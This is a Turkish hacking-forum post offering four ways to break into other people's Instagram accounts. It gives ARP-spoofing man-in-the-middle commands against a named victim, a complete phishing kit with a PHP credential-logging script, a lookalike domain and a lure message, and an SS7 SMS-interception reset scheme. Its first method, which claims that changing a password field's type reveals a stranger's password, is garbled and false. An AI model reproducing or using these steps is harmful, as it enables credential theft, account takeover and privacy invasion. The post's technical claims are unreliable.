Hoşgeldin Misafir

İnstagram Hackleme

Mustafa73

20 Eyl 2023
423 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Merhaba ben Mustafa73 Lojistik Tim adına paylaşım yapıyorum. İnstagram Hackleme makalesinde sizi görmekten mutluyum.
1) Kaynak Kodunu Kullanarak Instagram Hackleme: Bu yöntem, Instagram hesabının şifresini çalmak için bir tür hackleme yöntemidir. Bu yöntem, web tarayıcısının kaynak kodunu manipüle ederek, Instagram'ın şifreyi gizlemek için kullandığı kodu kırar. Bu yöntem, sadece Instagram hesabına giriş yapmış olan bir bilgisayarda çalışır. Bu yöntemi kullanmak için şu adımları takip etmeniz gerekir:
- Instagram web sitesine gidin ve sağ üst köşedeki profil simgesine tıklayarak çıkış yapın. Bu, arama kutusunu görmenizi sağlar.
- Web sayfasının kaynak kodunu görüntülemek için klavyenizde Ctrl + U tuşlarına basın. Bu, web sayfasının HTML kodunu gösteren yeni bir sekme açacaktır.
- Bu sekmede, Ctrl + F tuşlarına basarak arama kutusunu açın ve "action" kelimesini arayın. Bu, web sayfasındaki oturum açma formunun hangi dosyaya veri gönderdiğini belirten bir öznitelik bulmanızı sağlar. Bu özniteliğin değeri genellikle "https://www.instagram.com/accounts/login/ajax/" şeklindedir.
- Bu değeri kopyalayın ve bir not defterine yapıştırın. Ardından, değerin sonundaki "ajax" kısmını "process" olarak değiştirin. Bu, oturum açma formunun verileri işleyen farklı bir dosyaya göndermesini sağlayacaktır.
- Kaynak kod sekmesine geri dönün ve Ctrl + Shift + I tuşlarına basarak öğeyi incele seçeneğini açın. Bu, web sayfasının HTML kodunu düzenlemenize olanak tanıyan bir araç çubuğu açacaktır.
- Bu araç çubuğunda, yeşil renkle vurgulanan "action" özniteliğini bulun ve değerini not defterine yapıştırdığınız "process" ile değiştirin. Bu, oturum açma formunun verileri işleyen farklı bir dosyaya göndermesini sağlayacaktır.
- Değişiklikleri kaydetmek için araç çubuğunun sağ üst köşesindeki disket simgesine tıklayın ve web sayfasını yenileyin.
- Şimdi, şifresini çalmak istediğiniz kişinin kullanıcı adını arama kutusuna girin ve öğeyi incele seçeneğini kullanarak şifre kutusuna sağ tıklayın.
- Bu, şifre kutusunun HTML kodunu gösterecektir. Bu kodda, "< input type="password" " yazan bir satır bulacaksınız.
- Bu satırda, "password" kelimesini "text" olarak değiştirin. Bu, şifreyi gizlemek yerine göstermesini sağlayacaktır.
- Şimdi, şifresini çalmak istediğiniz kişinin şifresini görebilirsiniz.
Bu yöntem sadece Instagram hesabına giriş yapmış olan bir bilgisayarda çalışır. Eğer başka bir bilgisayarda denerseniz, bu yöntem işe yaramaz. Bu yöntemin çalışması için, Instagram hesabına giriş yapmış olan kişinin bilgisayarını kullanmanız gerekir. Bu da, kişisel mahremiyetini ihlal etmek anlamına gelir.
Instagram hesabınızın güvenliğini sağlamak için, iki faktörlü kimlik doğrulama gibi güvenlik özelliklerini etkinleştirmeniz ve güçlü bir şifre kullanmanız gerekir..
2) Ortadaki Adam Yöntemiyle Instagram Hackleme: Bu yöntem, bir Wi-Fi ağındaki veri paketlerini değiştirerek bir Instagram hesabını ele geçirmeyi amaçlayan bir saldırı türüdür. Bu yöntemi kullanmak için şu adımları takip etmeniz gerekir:
- Kali Linux, güvenlik testi ve sızma testi için tasarlanmış bir Linux dağıtımıdır. Bu işletim sistemini bir bilgisayara kurmanız veya bir USB bellekten çalıştırmanız gerekir.
- Ağ arayüzü komutu, bilgisayarınızın ağ bağlantılarını kontrol etmenizi sağlayan bir komuttur. Bu komutu kullanarak, Wi-Fi ağına bağlı olan ağ kartınızın adını öğrenebilirsiniz.
- Komut satırlarını yürütme konusunda iyi bilgi, bu yöntemi kullanmak için gerekli bir beceridir. Komut satırı, bilgisayarınıza metin tabanlı komutlar vermenizi sağlayan bir arayüzdür. Bu komutları doğru şekilde yazmanız ve çalıştırmanız gerekir.
- Ağ arayüzünün adını öğrenmek için, bir terminal açın ve ipconfig komutunu yazın. Bu komut, ağ bağlantılarınızın detaylarını gösterir. Wi-Fi ağınızın adını bulun ve not edin. Örneğin, wlan0, eth0, vb.
- Sızacağınız Wi-Fi yönlendiricisinin IP adreslerini almak için, bir terminal açın ve IP route show komutunu yazın. Bu komut, ağınızdaki yönlendiricilerin IP adreslerini gösterir. Genellikle, varsayılan yönlendiricinizin IP adresi 192.000.000.1 gibi bir şeydir. Bu IP adresini not edin.
- Hedef cihaz IP’si, saldıracağınız cihazın IP adresidir. Bu IP adresini bulmak için, bir Ağ İzleme Yazılım Aracı kullanabilirsiniz. Bu araçlar, ağınızdaki tüm cihazların IP adreslerini, MAC adreslerini ve diğer bilgilerini gösterir. Örneğin, Wireshark, Nmap, Zenmap, vb. Bu araçlardan birini çalıştırın ve hedef cihazın IP adresini bulun. Örneğin, 192.000.000.52, 192.000.000.53, vb.
- Yeni bir terminalde aşağıdaki komutu yürüterek Linux’ta IPv4 paket iletmeyi etkinleştirin: sysctl -w net.ipv4.ip_forward=1. Bu komut, bilgisayarınızın ağınızdaki veri paketlerini yönlendirmesine izin verir. Bu, saldırınızın başarılı olması için gereklidir.
- Arpspoof kullanarak kurbandan gelen paketleri durdurun. Arpspoof, bir ağdaki ARP protokolünü kullanarak sahte ARP yanıtları gönderen bir araçtır. Bu, ağdaki cihazların birbirlerinin IP ve MAC adreslerini yanlış tanımasına neden olur. Bu şekilde, hedef cihazın gönderdiği ve aldığı tüm paketleri bilgisayarınıza yönlendirebilirsiniz. Bu, komutun genel yapısıdır: arpspoof -i [Ağ Arayüzü Adı] -t [Victim IP] [Router IP]. Örnek: arpspoof -i wlan0 -t 192.000.000.52 192.000.000.1. Bu komutu çalıştırın ve durdurmayın.
- arpspoof sızdırma program kodunu kullanarak yönlendiriciden gelen paketleri durdurun. Bu komut, yönlendiricinin hedef cihaza gönderdiği paketleri de bilgisayarınıza yönlendirmenizi sağlar. Bu, saldırınızın tam olması için gereklidir. Aşağıdaki komutu yürütün: arpspoof -i [Ağ Arayüzü Adı] -t [Yönlendirici IP’si] [Kurban IP’si]. Örnek: arpspoof -i wlan0 -t 192.000.000.1 192.000.000.52. Bu komutu çalıştırın ve durdurmayın.
- Driftnet’i kullanarak kurban navigasyonundan görüntüleri koklayın. Driftnet, ağ trafiğini dinlemek ve TCP akışlarından görüntü almak için kullanılan bir programdır. Bu program, hedef cihazın Instagram'da veya başka bir web sitesinde gördüğü tüm resimleri yakalar ve size gösterir. Bu, driftnet komutunun yapısıdır: driftnet -i [Ağ Arayüzü Adı]. Örnek: driftnet -i wlan0. Bu komutu çalıştırın ve görüntüleri izleyin.
- urlsnarf kullanarak kurban navigasyonundan URL bilgilerini koklayın. Urlsnarf, bir Ortak Günlük biçimini izleyerek tüm HTTP isteklerini koklamanızı sağlar. Bu komut, hedef cihazın ziyaret ettiği tüm web sitelerinin URL'lerini yakalar ve size gösterir. Bu, saldırınızın daha fazla bilgi toplamanızı sağlar. Aşağıdaki komutu yürütün: urlsnarf -i [Ağ arabirimi adı]. Örnek: urlsnarf -i wlan0. Bu komutu çalıştırın ve URL'leri izleyin.
- Bittiğinde, aşağıdaki komutu yürüterek paket iletmeyi devre dışı bırakın: sysctl -w net.ipv4.ip_forward=0. Bu komut, bilgisayarınızın ağınızdaki veri paketlerini yönlendirmesini durdurur. Bu, saldırınızı sonlandırmak için gereklidir.
- Artık kişinin Instagram hesabına erişebilecek ve fotoğraflarını, yorumlarını ve mesajlarını görebileceksiniz. Bu, saldırınızın amacıdır.
3) Phishing ile Instagram Hesabı Hacklemek: Bu yöntem, bir kişiyi sahte bir Instagram giriş sayfasına yönlendirerek, onun kullanıcı adı ve şifresini ele geçirmeye çalışır. Bu yöntemde, saldırgan hedef kişiye bir bağlantı gönderir ve onu Instagram hesabına giriş yapması için ikna eder. Ancak bağlantı, gerçek Instagram sayfasına değil, saldırganın oluşturduğu sahte bir sayfaya götürür. Hedef kişi bilgilerini girer girmez, saldırgan bunları alır ve gerçek Instagram sayfasına yönlendirir. Bu yöntemi kullanmak için aşağıdaki adımları izleyebilirsiniz:
- İlk olarak, internet bağlantınız olduğundan emin olun. Bu yöntem için internet bağlantısı şarttır.
- Sonra, sahte bir kimlik avı sayfası oluşturmanız gerekir. Bu sayfa, gerçek Instagram giriş sayfasının birebir kopyası olmalıdır. Bunu yapmak için, Instagram.com'a gidin ve hesabınızdan çıkış yaptığınızdan emin olun. Ardından, klavyenizde Ctrl + U tuşlarına basarak sayfanın kaynak kodunu görüntüleyin. Bu kod, sayfanın nasıl göründüğünü ve nasıl çalıştığını belirleyen HTML kodudur. Kaynak kodunu gördüğünüzde, tümünü seçin, kopyalayın ve bir not defterine yapıştırın. Bunu Ctrl + A, Ctrl + C ve Ctrl + V tuşlarına basarak gerçekleştirebilirsiniz.
- Kaynak kodunu not defterine kopyaladıktan sonra, bir değişiklik yapmanız gerekir. Bu değişiklik, sayfadaki oturum açma formunun eylem özniteliğini değiştirmektir. Eylem özniteliği, formun verilerini nereye göndereceğini belirler. Şu anda, bu öznitelik gerçek Instagram sayfasına işaret ediyor. Bunu değiştirmek için, not defterinde eylem kelimesini arayın. Bunu Ctrl + F tuşlarına basarak gerçekleştirebilirsiniz. Eylem kelimesini bulduğunuzda, yanındaki değeri process.php ile değiştirin. Bu, formun verilerini process.php adlı bir dosyaya göndereceği anlamına gelir. Bu dosyayı daha sonra oluşturacağız. Değişikliği yaptıktan sonra, kaynak kodunu kaydedin. Bunu Ctrl + S tuşlarına basarak gerçekleştirebilirsiniz.
- Şimdi, sahte bir web sitesi oluşturmak için bir web barındırma hizmeti kullanmanız gerekir. Web barındırma hizmeti, web sitenizi internete yüklemenizi ve erişilebilir kılmanızı sağlar. Örneğin, 000webhost, Hostinger, Wix gibi hizmetlerden birini seçebilirsiniz. Bu hizmetlere ücretsiz olarak kaydolabilirsiniz. Web barındırma hizmetine kaydolduğunuzda, bir alan adı seçmeniz gerekir. Alan adı, web sitenizin internet adresidir. Örneğin, instagram-login.com gibi. Bu alan adının gerçek Instagram sayfasına benzediğinden emin olun. Böylece, hedef kişi fark etmez ve bağlantıya tıklar.
- Web barındırma hizmetinin kontrol paneline girdiğinizde, dosya yöneticisini açın. Buradan, kaynak kodunu kaydettiğiniz not defteri dosyasını yükleyin. Dosyanın adını index.html olarak değiştirin. Bu, web sitenizin ana sayfası olacaktır. Ayrıca, process.php adında başka bir dosya oluşturun ve aşağıdaki kodu içine yapıştırın:
php
<?php
header ('Location: https://www.instagram.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
- Bu kod, hedef kişinin girdiği kullanıcı adı ve şifreyi log.txt adlı bir dosyaya kaydeder ve onu gerçek Instagram sayfasına yönlendirir. Böylece, hedef kişi hiçbir şeyden şüphelenmez. Bu iki dosyayı web barındırma hizmetine yükledikten sonra, sahte web sitenizin hazır olduğunu göreceksiniz.
- Son adım olarak, hedef kişiye sahte web sitenizin bağlantısını gönderin ve onu Instagram hesabına giriş yapması için ikna edin. Örneğin, ona bir mesaj gönderebilirsiniz: "Hey, bu yeni Instagram özelliğini gördün mü? Çok harika! Hemen denemelisin. İşte bağlantısı: https://instagram-login.com"
- Hedef kişi bağlantıya tıkladığında, sahte Instagram giriş sayfasına yönlendirilecek ve kullanıcı adı ve şifresini girmesi istenecektir. Hedef kişi bilgilerini girdiğinde, siz de web barındırma hizmetinin kontrol panelinden log.txt dosyasını açarak bunları alabileceksiniz.
Bu yöntem, Instagram kimlik avı yöntemi olarak bilinir ve çok yaygın bir siber saldırı türüdür. Bu yöntemle, saldırganlar Instagram hesaplarını ele geçirerek, onları kötü amaçlı olarak kullanabilir, reklam geliri elde edebilir veya fidye isteyebilirler. Bu yöntemden korunmak için, şüpheli bağlantılara tıklamamak, Instagram hesabınızın güvenliğini artırmak ve iki faktörlü kimlik doğrulama gibi özellikleri etkinleştirmek önemlidir.
4) SS-7 GÜVENLİK AÇIĞI KULLANARAK İNSTAGRAM HACKLEME: SS7 Güvenlik Açığı, GSM ağlarında kullanılan bir iletişim protokolü olan SS7'nin (Signaling System 7) zayıf noktalarını kullanan bir siber saldırı türüdür. SS7, cep telefonlarının kendi operatörleri dışındaki operatörler ile haberleşmesini sağlayan bir ağdır. Bu ağ üzerinden, saldırganlar hedef kişinin SMS trafiğini, konumunu, arama kayıtlarını ve diğer bilgilerini ele geçirebilirler.
SS7 Güvenlik Açığı kullanarak Instagram hesabına erişmek için, hedef kişinin cep telefonu numarasını bilmek ve SS7 ağına erişim sağlayabilecek bir Linux işletim sistemi ve SS7 SDK'sına sahip olmak gerekmektedir. Bu şartları sağladıktan sonra, aşağıdaki adımları takip edebilirsiniz:
- Hedefin cep telefonu numarasını sahte bir MSC (Mobile Switching Center) düğümüne kaydedin. Bu sayede, hedefin gerçek operatörü ile bağlantısı kesilecek ve sizin kontrolünüzdeki sahte operatöre yönlendirilecektir.
- Instagram'da Parolamı Unuttum seçeneğini açın ve kullanıcının cep telefonu numarasını girin. Instagram, hedefe iki faktörlü kimlik doğrulama için bir kurtarma kodu gönderecektir.
- Gerçek MSC, SMS'yi SMS-C (Short Message Service Center)'ye dönüştürecektir. SMS-C, HLR (Home Location Register) ile iletişime geçecek ve hedefin yerini soracaktır.
- Gerçek HLR, sahte olan bir MSC adresi sağlayarak yanıt verecektir. Böylece, iki faktörlü kimlik doğrulama kurtarma kodu ele geçirilecek ve cihazınıza yönlendirilecektir.
- Ardından şifreyi sıfırlayabilir ve kişinin Instagram hesabına erişebilirsiniz.
Bu adımları izleyerek, SS7 Güvenlik Açığı'nı kullanarak Instagram hesabına erişebilirsiniz.


LOJİSTİK TİM SUNDU